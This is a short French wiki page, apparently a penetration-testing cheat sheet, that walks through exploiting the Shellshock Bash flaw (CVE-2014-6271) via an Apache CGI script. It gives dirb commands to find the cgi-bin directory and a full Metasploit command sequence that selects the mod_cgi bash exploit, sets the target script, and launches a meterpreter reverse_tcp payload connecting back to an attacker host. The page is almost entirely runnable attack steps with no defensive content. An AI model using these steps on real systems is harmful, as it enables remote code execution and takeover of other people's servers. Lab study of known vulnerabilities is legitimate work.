Shelshock metasploit
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Vulnérabilité | Shellshock (Bash, CVE-2014-6271) |
| Vecteur | CGI Apache (mod_cgi)
|
| Module | exploit/multi/http/apache_mod_cgi_bash_env_exec
|
| Voir aussi | Vsftp backdoor · Unreal irc |
Exploitation de la vulnérabilité Shellshock (faille Bash, CVE-2014-6271) via un script CGI Apache : une variable d'environnement piégée est interprétée par Bash et exécute du code à distance.
Découverte des répertoires
dirb http://192.168.0.1/ /usr/share/dirb/wordlists/common.txt
dirb http://192.168.0.1/cgi-bin /usr/share/dirb/wordlists/common.txt
Exploitation
msfconsole
search mod_cgi
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOST Domain.tld
set TARGETURI /cgi-bin/script.sh
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST IP_Localhost
exploit
Voir aussi
- Vsftp backdoor — autre RCE applicatif
- Unreal irc — backdoor UnrealIRCd